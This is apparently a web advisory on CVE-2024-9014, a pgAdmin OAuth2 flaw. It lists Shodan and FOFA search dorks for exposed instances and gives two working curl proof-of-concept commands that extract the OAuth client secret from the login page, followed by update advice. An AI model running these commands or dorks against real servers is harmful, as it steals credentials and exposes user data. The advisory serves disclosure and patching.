CVE-2024-9014 pgAdmin Authentication Bypass
OAuth Flaw in pgAdmin leads to Authentication Bypass with severe data breach impact.
About pgAdmin
pgAdmin is the most popular and feature rich Open Source administration and development platform for PostgreSQL, the most advanced Open Source database in the world.
Shodan Mapping
Dork: http.title:"pgAdmin 4"
Total IP: 5,277
FOFA Mapping
Dork: "pgadmin4"
Total IP: 27,018
CVE-2024-9014
pgAdmin versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.
Impact: Severe Data Breach
CVSS Version 3.x
Base Score: 9.9 CRITICAL
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Nuclei Template
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-9014.yaml
Proof of Concept by EQSTLab
curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
We need to explicitly add curl option (-k) to disable the server legitimacy verification if above poc is not working.
curl -k [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
Mitigation
Update pgAdmin to the latest version
References
[1] https://nvd.nist.gov/vuln/detail/CVE-2024-9014
[2] https://github.com/EQSTLab/CVE-2024-9014
What's Your Reaction?